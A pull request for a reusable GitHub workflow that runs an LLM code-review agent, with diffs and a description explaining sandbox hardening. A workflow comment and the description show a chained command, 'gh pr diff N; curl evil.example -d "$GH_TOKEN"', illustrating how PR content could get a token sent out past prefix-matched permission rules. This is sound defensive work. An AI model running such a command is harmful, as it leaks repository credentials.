+          cat > /tmp/review_prompt.txt <<'EOF'
+          REPO: ${{ github.repository }}
+          PR NUMBER: ${{ github.event.pull_request.number }}
+
+          Follow these steps:
+
+          1. Read /tmp/review_context.md — it contains full review instructions, PR context, previous review (if any), acknowledged suggestions to skip, and the required output format.
+
+          2. Run `gh pr diff ${{ github.event.pull_request.number }}` to get the changed files and diffs.
+
+          3. For each changed file, use Read to open the full file — not just the diff hunk.
+             Full file context is required to understand the complete impact of each change.
+
+          4. For each changed file, identify and Read its dependencies:
+             - Imported modules, utilities, or shared helpers referenced in the changed code
+             - Type definitions, interfaces, or enums used by the changed code
+             - Parent components or callers if the changed file exports something modified
+             - Related test files (e.g. *.spec.ts, *.test.ts) to assess coverage gaps
+
+          5. After reading ALL files and dependencies, compile your complete review.
+             Write the ENTIRE review to /tmp/ai_review_output.txt using the Write tool.
+             Do NOT call gh pr comment — the next step posts the file as a single comment.
+          EOF
+
+          # Bash is restricted to `gh pr diff` / `gh pr view` via config.toml permission rules,
+          # so the review is guaranteed to be posted by the dedicated step below (exactly one comment).
+          kimi -p "$(cat /tmp/review_prompt.txt)"
+
+      # ==================== END ENGINE: Kimi Code CLI ======================
+
+      - name: Post review as single PR comment
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          PR_NUMBER="${{ github.event.pull_request.number }}"
+
+          if [ ! -f /tmp/ai_review_output.txt ] || [ ! -s /tmp/ai_review_output.txt ]; then
+            echo "❌ Review file missing or empty — the review agent did not write output"
+            exit 1
+          fi
+
+          echo "📬 Posting review ($(wc -c < /tmp/ai_review_output.txt) bytes)..."
+          gh pr comment "$PR_NUMBER" --body-file /tmp/ai_review_output.txt
+          echo "✅ Review posted"
+
+      - name: Emit review event to metrics dashboard
+        if: always()
+        env:
+          AGENT_METRICS_API_URL: ${{ secrets.AGENT_METRICS_API_URL }}
+          AGENT_METRICS_API_KEY: ${{ secrets.AGENT_METRICS_API_KEY }}
+          CURRENT_SHA: ${{ steps.build-context.outputs.current_sha }}
+          EVENT_TYPE: ${{ steps.build-context.outputs.event_type }}
+        run: |
+          PR_NUMBER="${{ github.event.pull_request.number }}"
+          REPO="${{ github.repository }}"
+          TIMESTAMP=$(date -u +"%Y-%m-%dT%H:%M:%SZ")
+          REVIEW_SIZE=$(wc -c < /tmp/ai_review_output.txt 2>/dev/null || echo "0")
+
+          # Build the event payload with jq so all values are safely escaped
+          EVENT_PAYLOAD=$(jq -n \
+            --arg agent "ai_review" \
+            --arg event_type "$EVENT_TYPE" \
+            --arg timestamp "$TIMESTAMP" \
+            --arg pr_number "$PR_NUMBER" \
+            --arg repo "$REPO" \
+            --arg commit_sha "$CURRENT_SHA" \
+            --argjson review_size_bytes "$REVIEW_SIZE" \
+            --arg model "$REVIEW_MODEL" \
+            '{
+              agent: $agent,
+              event_type: $event_type,
+              timestamp: $timestamp,
+              pr_number: $pr_number,
+              repo: $repo,
+              payload: {
+                commit_sha: $commit_sha,
+                review_size_bytes: $review_size_bytes,
+                model: $model
+              }
+            }')
+
+          # Always write to job summary so every run is "logged" regardless of dashboard state
+          echo "### AI Review Event" >> "$GITHUB_STEP_SUMMARY"
+          echo "| Field | Value |" >> "$GITHUB_STEP_SUMMARY"
+          echo "|---|---|" >> "$GITHUB_STEP_SUMMARY"
+          echo "| **agent** | \`ai_review\` |" >> "$GITHUB_STEP_SUMMARY"
+          echo "| **event_type** | \`$EVENT_TYPE\` |" >> "$GITHUB_STEP_SUMMARY"
+          echo "| **pr_number** | \`$PR_NUMBER\` |" >> "$GITHUB_STEP_SUMMARY"
+          echo "| **repo** | \`$REPO\` |" >> "$GITHUB_STEP_SUMMARY"
+          echo "| **commit_sha** | \`$CURRENT_SHA\` |" >> "$GITHUB_STEP_SUMMARY"
+          echo "| **model** | \`$REVIEW_MODEL\` |" >> "$GITHUB_STEP_SUMMARY"
+          echo "| **review_size_bytes** | $REVIEW_SIZE |" >> "$GITHUB_STEP_SUMMARY"
+          echo "| **timestamp** | $TIMESTAMP |" >> "$GITHUB_STEP_SUMMARY"
+          echo "" >> "$GITHUB_STEP_SUMMARY"
+          echo "<details><summary>Raw JSON payload</summary>" >> "$GITHUB_STEP_SUMMARY"
+          echo "" >> "$GITHUB_STEP_SUMMARY"
+          echo '```json' >> "$GITHUB_STEP_SUMMARY"
+          echo "$EVENT_PAYLOAD" >> "$GITHUB_STEP_SUMMARY"
+          echo '```' >> "$GITHUB_STEP_SUMMARY"
+          echo "" >> "$GITHUB_STEP_SUMMARY"
+          echo "</details>" >> "$GITHUB_STEP_SUMMARY"
+
+          # POST to the metrics dashboard only when AGENT_METRICS_API_URL is set
+          if [[ -n "$AGENT_METRICS_API_URL" ]]; then
+            echo "📡 Sending event to metrics dashboard..."
+            echo "$EVENT_PAYLOAD" > /tmp/event_payload.json
+
+            CURL_HEADERS=(-H "Content-Type: application/json")
+            [[ -n "$AGENT_METRICS_API_KEY" ]] && CURL_HEADERS+=(-H "X-API-Key: $AGENT_METRICS_API_KEY")
+
+            HTTP_CODE=$(curl -s -w "%{http_code}" -o /tmp/event_response.json \
+              "${CURL_HEADERS[@]}" \
+              "${AGENT_METRICS_API_URL}/api/v1/events" \
+              -X POST \
+              -d @/tmp/event_payload.json)
+
+            if [[ "$HTTP_CODE" == "200" || "$HTTP_CODE" == "201" ]]; then
+              echo "✅ Event sent to dashboard (HTTP $HTTP_CODE)"
+            else
+              echo "⚠️ Dashboard POST returned HTTP $HTTP_CODE — event is still logged in job summary"
+              cat /tmp/event_response.json || true
+            fi
+          else
+            echo "ℹ️ AGENT_METRICS_API_URL not set — event logged to job summary only"
+          fi
+
+          # Write payload for artifact upload
+          echo "$EVENT_PAYLOAD" > click2fix-payload.json
+
+      - name: Upload review summary as artifact
+        if: always()
+        uses: actions/upload-artifact@v4
+        with:
+          name: ai-review-summary-${{ github.run_id }}
+          path: click2fix-payload.json
+          retention-days: 7

--- a/.github/workflows/ai-pr-review.yml
+++ b/.github/workflows/ai-pr-review.yml
@@ -39,9 +39,9 @@ on:
         default: "1048576"
         type: string
       cli_version:
-        description: "[engine-specific] Version of the review CLI to install (npm dist-tag or version)."
+        description: "[engine-specific] Exact version of the review CLI to install. Pinned deliberately — @moonshot-ai/kimi-code is pre-1.0 and ships minor releases weekly, so `latest` risks both breaking changes and unreviewed code in a privileged job. Bump via PR."
         required: false
-        default: "latest"
+        default: "0.34.0"
         type: string
       prompt_gist_url:
         description: "URL to fetch prompt template from"
@@ -66,11 +66,13 @@ jobs:
     if: github.event.pull_request.draft == false
 
     permissions:
+      # No step calls the Actions API, so `actions: write` is deliberately absent
+      # (the sibling claude-pr-review.yml grants it for claude-code-action's
+      # internals). upload-artifact uses ACTIONS_RUNTIME_TOKEN, not this token.
       contents: read
       pull-requests: write
       issues: write
       id-token: write
-      actions: write
 
     concurrency:
       group: ai-pr-review-${{ github.event.pull_request.number }}
@@ -295,6 +297,21 @@ jobs:
 
           echo "📋 Review context built ($(wc -c < /tmp/review_context.md) bytes)"
 
+      - name: Fetch PR diff for review
+        # Fetched here with the trusted token rather than by the review agent, so the
+        # agent needs no shell tool at all. Without this, the agent's only route to the
+        # diff is Bash, and the sandbox then rests on how the engine matches command
+        # patterns — `gh pr diff N; curl evil.example -d "$GH_TOKEN"` still carries the
+        # allowed prefix under a naive glob match. Pre-fetching removes that class of
+        # bypass entirely instead of relying on undocumented matching semantics.
+        env:
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+        run: |
+          PR_NUMBER="${{ github.event.pull_request.number }}"
+          gh pr diff "$PR_NUMBER" > /tmp/pr_diff.txt
+          [[ -s /tmp/pr_diff.txt ]] || { echo "❌ PR diff is empty"; exit 1; }
+          echo "✅ PR diff fetched ($(wc -c < /tmp/pr_diff.txt) bytes)"
+
       # ======================= ENGINE: Kimi Code CLI =======================
       # Everything below (strip config, install, configure, run) is the engine.
       # Replacing it is a rewrite of all four steps, not a config change.
@@ -306,10 +323,12 @@ jobs:
       #     security boundary, and the file names are engine-specific — e.g.
       #     Kimi reads .kimi-code/{mcp.json,local.toml}, Codex reads .codex/rules/.
       #     Do not carry this step over unchanged.
-      #   - reads /tmp/review_context.md and the checked-out PR code
+      #   - reads /tmp/review_context.md, /tmp/pr_diff.txt and the checked-out code
       #   - writes the final review markdown to /tmp/ai_review_output.txt
-      #   - restricts the agent so it cannot post PR comments itself (the post
-      #     step below guarantees exactly one comment)
+      #   - grants NO shell/command tool. Everything the review needs is already on
+      #     disk, so the agent cannot post a comment, reach the network, or depend on
+      #     the engine's command-pattern matching being argv-aware. The post step
+      #     below is what guarantees exactly one comment.
       # ===================================================================
 
       - name: Strip PR-supplied agent config (Kimi Code)
@@ -327,7 +346,7 @@ jobs:
 
       - name: Install review CLI (Kimi Code)
         env:
-          CLI_VERSION: ${{ inputs.cli_version || 'latest' }}
+          CLI_VERSION: ${{ inputs.cli_version || '0.34.0' }}
         run: |
           npm install -g "@moonshot-ai/kimi-code@${CLI_VERSION}"
           kimi --version
@@ -339,18 +358,19 @@ jobs:
           # Model + provider are defined entirely through the KIMI_MODEL_* env channel
           # on the run step (no credentials written to disk); this config file only
           # restricts the tool surface:
-          #   Read, Write(/tmp only), Bash(gh pr diff:*), Bash(gh pr view:*)
-          # Grep/Glob stay available as read-only exploration helpers.
+          #   Read, Write(/tmp only), Grep, Glob — no Bash.
+          # The diff is pre-fetched to /tmp/pr_diff.txt, so the agent has no reason to
+          # run commands. Bash is left out of `enabled` AND denied by rule, so neither
+          # control has to be correct on its own.
           cat > "$HOME/.kimi-code/config.toml" <<'EOF'
           default_permission_mode = "auto"
 
           [tools]
-          enabled = ["Read", "Write", "Bash", "Grep", "Glob"]
+          enabled = ["Read", "Write", "Grep", "Glob"]
 
           # Rules are matched first-match-wins, before the mode default applies.
           # Write is allowed only under /tmp (review output); everything else is
-          # denied so the agent cannot modify the checkout. Bash is pinned to the
-          # two read-only gh commands the review needs.
+          # denied so the agent cannot modify the checkout.
           [[permission.rules]]
           decision = "allow"
           pattern = "Write(/tmp/*)"
@@ -358,14 +378,6 @@ jobs:
           [[permission.rules]]
           decision = "deny"
           pattern = "Write"
-
-          [[permission.rules]]
-          decision = "allow"
-          pattern = "Bash(gh pr diff*)"
-
-          [[permission.rules]]
-          decision = "allow"
-          pattern = "Bash(gh pr view*)"
 
           [[permission.rules]]
           decision = "deny"
@@ -377,7 +389,6 @@ jobs:
       - name: Run AI PR review (Kimi Code)
         timeout-minutes: 60
         env:
-          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
           KIMI_MODEL_NAME: ${{ env.REVIEW_MODEL }}
           KIMI_MODEL_API_KEY: ${{ secrets.LLM_API_KEY }}
           KIMI_MODEL_BASE_URL: ${{ inputs.base_url || 'https://litellmsa.deriv.ai/v1' }}
@@ -395,7 +406,7 @@ jobs:
 
           1. Read /tmp/review_context.md — it contains full review instructions, PR context, previous review (if any), acknowledged suggestions to skip, and the required output format.
 
-          2. Run `gh pr diff ${{ github.event.pull_request.number }}` to get the changed files and diffs.
+          2. Read /tmp/pr_diff.txt — it contains the full diff for this PR (changed files and hunks), already fetched for you. You have no shell tool; everything you need is on disk.
 
           3. For each changed file, use Read to open the full file — not just the diff hunk.
              Full file context is required to understand the complete impact of each change.
@@ -408,11 +419,12 @@ jobs:
 
           5. After reading ALL files and dependencies, compile your complete review.
              Write the ENTIRE review to /tmp/ai_review_output.txt using the Write tool.
-             Do NOT call gh pr comment — the next step posts the file as a single comment.
+             The next step posts that file as a single PR comment.
           EOF
 
-          # Bash is restricted to `gh pr diff` / `gh pr view` via config.toml permission rules,
-          # so the review is guaranteed to be posted by the dedicated step below (exactly one comment).
+          # No GH_TOKEN in this step's env and no Bash tool in the config: the agent
+          # cannot reach the GitHub API at all, so the post step below is the only
+          # thing that can comment on the PR.
           kimi -p "$(cat /tmp/review_prompt.txt)"
 
       # ==================== END ENGINE: Kimi Code CLI ======================

--- a/.github/workflows/ai-pr-review.yml
+++ b/.github/workflows/ai-pr-review.yml
@@ -90,10 +90,15 @@ jobs:
       # API, and claude-code-action's docs at the pinned SHA ask for
       # `actions: read` only, for the opt-in CI-log feature we do not enable.
       # If the Anthropic engine ever needs it, add `actions: read` — not write.
+      #
+      # `id-token:` is absent for the same reason. It only enables OIDC token
+      # minting for cloud federation, which nothing here does — both engines
+      # authenticate to the proxy with a bearer key. Self-hosted runner
+      # registration does not use the job token, so the runner group is
+      # unaffected.
       contents: read
       pull-requests: write
       issues: write
-      id-token: write
 
     concurrency:
       group: ai-pr-review-${{ github.event.pull_request.number }}
@@ -198,8 +203,13 @@ jobs:
         env:
           PROMPT_GIST_URL: ${{ inputs.prompt_gist_url || 'https://gist.githubusercontent.com/DerivFE/048e18e3d2e8c0cddf4c3f434835d57f/raw/claude-review-format.md' }}
         run: |
-          PROMPT_TEMPLATE=$(curl -sL "$PROMPT_GIST_URL")
-          [[ -z "$PROMPT_TEMPLATE" ]] && echo "❌ Failed to fetch prompt" && exit 1
+          # -f matters: without it curl exits 0 on 4xx/5xx and returns the error
+          # page body, which is non-empty — so the emptiness check below would
+          # pass and GitHub's 404 page would silently become the review's
+          # instruction template.
+          PROMPT_TEMPLATE=$(curl -sfL "$PROMPT_GIST_URL") \
+            || { echo "❌ Failed to fetch prompt (HTTP error from $PROMPT_GIST_URL)"; exit 1; }
+          [[ -z "$PROMPT_TEMPLATE" ]] && echo "❌ Failed to fetch prompt (empty body)" && exit 1
 
           PROMPT_TEMPLATE=$(echo "$PROMPT_TEMPLATE" | sed '1s/^prompt:[[:space:]]*|[[:space:]]*//' | sed 's/^____$//g' | sed 's/____$//g')
 

--- a/README.md
+++ b/README.md
@@ -23,7 +23,7 @@ Everything here is consumed at `@master`, so **changes are live for every consum
 
 | Workflow | Replacement | Notes |
 |---|---|---|
-| `claude-pr-review.yml` | `ai-pr-review.yml` with `engine: anthropic` | Delegates to the replacement; see the [migration guide](.github/workflows/AI_PR_REVIEW_README.md#migrating-from-claude-pr-reviewyml). Do not delete until consumers are migrated and deprecation telemetry has been silent for 30 days. |
+| `claude-pr-review.yml` | `ai-pr-review.yml` with `engine: anthropic` | **Still a standalone duplicate** — converting it into a delegating shim is a tracked follow-up. See the [migration guide](.github/workflows/AI_PR_REVIEW_README.md#migrating-from-claude-pr-reviewyml). Do not delete until consumers are migrated and deprecation telemetry has been silent for 30 days. |
 
 Add a row here when deprecating anything. With no CHANGELOG and no release process, this table is the only coordination mechanism the repo has.
 

--- a/README.md
+++ b/README.md
@@ -2,6 +2,31 @@
 
 This repository is dedicated to hosting reusable GitHub Actions YAML files that can be shared across different repositories. Centralizing common actions, to promote consistency and efficiency in workflows.
 
+It holds two kinds of thing:
+
+- **Reusable workflows** (`.github/workflows/*.yml`) — called from another repo with `jobs.<id>.uses:`
+- **Composite actions** (`.github/actions/<name>/action.yml`) — called from a step with `uses:`
+
+Everything here is consumed at `@master`, so **changes are live for every consumer as soon as they merge.** There is no release gate; the `v1`–`v4` tags are stale and referenced by nothing. Treat every change as immediately org-wide, and prefer changes that are revertable in one commit.
+
+### Reusable workflows
+
+| Workflow | Purpose | Docs | Status |
+|---|---|---|---|
+| [`ai-pr-review.yml`](.github/workflows/ai-pr-review.yml) | LLM PR review; engine selectable (`kimi` \| `anthropic`) | [AI_PR_REVIEW_README.md](.github/workflows/AI_PR_REVIEW_README.md) | ✅ active |
+| [`claude-pr-review.yml`](.github/workflows/claude-pr-review.yml) | Claude PR review | — | ⚠️ **deprecated** → use `ai-pr-review.yml` with `engine: anthropic` |
+| [`docsync-ai.yml`](.github/workflows/docsync-ai.yml) | Keeps docs in sync with code; scheduled + comment-triggered | — | ✅ active |
+| [`dependonme-bot.yml`](.github/workflows/dependonme-bot.yml) | Auto-fixes Dependabot security alerts | [DEPENDONME_BOT_README.md](.github/workflows/DEPENDONME_BOT_README.md) | ✅ active |
+| [`qa-checklist.yml`](.github/workflows/qa-checklist.yml) | Generates a QA checklist for a PR | — | ✅ active |
+
+### Deprecations
+
+| Workflow | Replacement | Notes |
+|---|---|---|
+| `claude-pr-review.yml` | `ai-pr-review.yml` with `engine: anthropic` | Delegates to the replacement; see the [migration guide](.github/workflows/AI_PR_REVIEW_README.md#migrating-from-claude-pr-reviewyml). Do not delete until consumers are migrated and deprecation telemetry has been silent for 30 days. |
+
+Add a row here when deprecating anything. With no CHANGELOG and no release process, this table is the only coordination mechanism the repo has.
+
 #### Example Usage
 
 ```


### PR DESCRIPTION
## Summary

Adds `ai-pr-review.yml`, a reusable PR-review workflow whose **LLM engine is a parameter**. Each engine is a composite action, so one workflow serves both Kimi K3 and Claude — and `claude-pr-review.yml` (415 lines, ~90% duplicated scaffolding) can be retired rather than maintained in parallel.

That duplication has already cost us: a config-stripping fix landed in one file and never reached the other, leaving a `.claude/settings.json` hook-injection vector open across 14 consumer repos. This PR closes that too.

```
.github/workflows/ai-pr-review.yml                      # scaffolding + engine dispatch
.github/actions/ai_review_engine_kimi/action.yml        # Kimi Code CLI
.github/actions/ai_review_engine_anthropic/action.yml   # claude-code-action
.github/workflows/AI_PR_REVIEW_README.md                # full docs
```

Adding a third engine is 3 edits: a new action, a `case` arm, an `if:`-gated dispatch step. Documented in the README.

## Engine contract

Each engine strips PR-supplied agent config as its **first** step, grants the model **no shell tool**, reads a pre-built context and pre-fetched diff, and writes review markdown to a file. Engines never post comments — one dedicated step does, so a PR gets exactly one review comment.

Making that a real action boundary rather than a comment block is the point: the previous version documented the contract in prose, and the stripping step still ended up outside it.

## Security hardening

Both engines, including the Anthropic one that inherits from `claude-pr-review.yml`:

- **No shell tool.** The diff is pre-fetched with the trusted token, so `Bash(gh pr diff:*)` bought nothing while resting on the CLI's command-pattern matching being argv-aware. Under a naive prefix match, `gh pr diff N; curl evil -d "$GH_TOKEN"` carries the allowed prefix — and the review input is attacker-influenced PR content.
- **Full config stripping.** `.claude/` (hooks execute arbitrary commands), `.mcp.json`, `.kimi-code/` (MCP servers), plus all instruction files. None of these are gated by a tool allowlist. `claude-pr-review.yml` strips only `CLAUDE.md` today.
- **`Write` confined to the output directory** on the Kimi engine (allow rule + catch-all deny). Not on the Anthropic engine — `--allowedTools` adds to a base tool set rather than replacing it, and a scoped `Write(/path)` is undocumented there and was previously recorded as making the tool unavailable. The asymmetry is documented in the README and in the test plan.
- **Everything pinned to immutable refs.** `cli_version` off `latest` (the package is pre-1.0, ships weekly), and all third-party actions to commit SHAs rather than mutable `@v4`/`@v6` tags — this job holds `LLM_API_KEY` and a write-scoped `GITHUB_TOKEN`. SHAs are the current tip of the majors already in use, so no version change.
- **`track_progress` dropped**, since it forces tag mode and makes the action post its own tracking comment that no cleanup step reaps.

## Three latent bugs fixed

Pre-existing in **both** workflows, found while rewriting the cleanup step:

1. **Missing `--paginate`** — the 30-comment default already skipped reviews on busy PRs and left duplicates. ⚠️ Fixing this means the workflow will now delete comments it previously missed.
2. **Multi-line `$GITHUB_OUTPUT` corruption** — multiple matching comments were concatenated into `last_reviewed_sha`. Latent today, near-certain once legacy-marker matching lands.
3. **Swallowed API failures** — treated as "no previous review", silently losing follow-up mode.

Comment dedup also no longer depends on the model reproducing a header: the post step appends a canonical `<!-- deriv-pr-review -->` marker itself. One reworded header used to mean a permanent duplicate comment.

## Migration-safety details

- `engine` defaults to `kimi`, but per-engine values are pinned so routing a repo here is externally invisible: the `anthropic` engine keeps reporting `agent=claude_review` and emitting `claude-review-summary-*` artifacts.
- A `legacy_markers` input lets a run also reap `Claude PR Review Complete` comments. Without it, every PR open across the cutover keeps an orphaned comment forever. The README states the exact condition for removing it.
- `actions: write` is reinstated as **provisional** — a reusable workflow can't request more than its caller grants, and all 14 callers grant it. Evidence in the comment says it's removable; the removal ordering (workflow first, callers second) is documented, since the reverse breaks every run.

## Not in this PR

The consumer migration is sequenced separately: the required-status-check audit across the 14 repos, the dogfood run, converting `claude-pr-review.yml` into a delegating shim, migrating callers in batches, then deletion. This PR only makes that possible.

## Test plan

- [x] `yaml-lint` clean on all three files; `actionlint` reports no errors on the workflow
- [ ] **Dogfood run** on a PR that already carries a `Claude PR Review Complete` comment — the only way to validate legacy-marker cleanup against real data. Confirm: exactly one comment afterwards, the old one deleted, follow-up mode engaging on a second push with a single-line `last_reviewed_sha`
- [ ] Confirm `KIMI_MODEL_PROVIDER_TYPE: kimi` is compatible with the LiteLLM proxy's wire format, and that the deny rules hold under `kimi -p`
- [ ] Confirm whether `actions: write` is actually needed, then drop it if not
- [ ] Verify a PR shipping `.kimi-code/` or `.claude/` cannot alter the review agent's permissions

> Note: `actionlint` does **not** validate composite actions, only `.github/workflows/` — the engine files need `yaml-lint` plus human review.

🤖 Generated with [Claude Code](https://claude.com/claude-code)